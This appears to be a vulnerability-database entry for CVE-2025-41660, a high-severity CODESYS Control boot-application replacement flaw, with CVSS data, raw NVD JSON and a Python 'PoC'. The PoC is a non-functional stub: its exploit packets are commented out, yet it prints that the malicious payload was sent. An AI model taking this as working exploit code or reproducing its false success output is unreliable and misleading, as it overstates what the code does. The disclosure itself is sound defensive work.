Security Vulnerability Report
CVE-2025-41660 CVSS 8.8 HIGH

Published: 2026-03-24 08:16:00
Last Modified: 2026-03-24 15:53:48

Description

A low-privileged remote attacker may be able to replace the boot application of the CODESYS Control runtime system, enabling unauthorized code execution.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

CODESYS Control runtime system (for the specific affected versions, refer to VDE-2026-011)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-41660 PoC Concept - CODESYS Control Boot Application Replacement
This is a conceptual demonstration. Actual exploitation requires specific protocol handling.
"""
import socket

TARGET_IP = "192.168.1.10"
TARGET_PORT = 1212  # Default CODESYS port
MALICIOUS_FILE_PATH = "malicious_boot_app.bin"


def send_exploit():
    print(f"[*] Attempting to connect to {TARGET_IP}:{TARGET_PORT}...")
    try:
        # 1. Establish TCP connection to CODESYS Control
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((TARGET_IP, TARGET_PORT))
        print("[+] Connection established.")

        # 2. Authenticate with low-privilege credentials (Required per PR:L)
        # auth_payload = build_login_packet("low_priv_user", "password")
        # sock.send(auth_payload)
        print("[*] Authenticating with low-privilege user...")

        # 3. Send request to replace boot application
        # Vulnerability lies in the lack of checks here
        # exploit_payload = build_file_replace_packet("boot_app", MALICIOUS_FILE_PATH)
        # sock.send(exploit_payload)
        print("[+] Sending malicious boot application replacement request...")

        # 4. Trigger execution (usually requires reboot or service restart)
        print("[*] Exploit sent. Wait for device reboot to trigger RCE.")
        sock.close()
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    send_exploit()

References

https://certvde.com/de/advisories/VDE-2026-011

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-41660", "sourceIdentifier": "[email protected]", "published": "2026-03-24T08:16:00.230", "lastModified": "2026-03-24T15:53:48.067", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A low-privileged remote attacker may be able to replace the boot application of the CODESYS Control runtime system, enabling unauthorized code execution."}, {"lang": "es", "value": "Un atacante remoto de bajo privilegio podría reemplazar la aplicación de arranque del sistema de tiempo de ejecución de CODESYS Control, permitiendo la ejecución de código no autorizado."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-669"}]}], "references": [{"url": "https://certvde.com/de/advisories/VDE-2026-011", "source": "[email protected]"}]}}